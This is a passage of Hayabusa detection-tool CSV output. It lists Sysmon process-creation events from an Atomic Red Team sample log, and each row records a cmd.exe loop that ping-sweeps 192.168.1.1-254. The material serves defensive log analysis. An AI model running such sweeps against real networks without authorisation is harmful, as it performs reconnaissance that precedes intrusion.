747F3D96-D926-5D31-0000-00101B483500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D927-5D31-0000-0010F24D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7152 | PGUID: 747F3D96-D929-5D31-0000-00109D593500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D929-5D31-0000-0010765F3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5400 | PGUID: 747F3D96-D92C-5D31-0000-00107A713500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 747F3D96-D92D-5D31-0000-001068773500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D933-5D31-0000-001098AF3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 747F3D96-D936-5D31-0000-00102EC73500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 747F3D96-D939-5D31-0000-001090E23500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-D93A-5D31-0000-00105FF83500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D93C-5D31-0000-0010B5053600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: 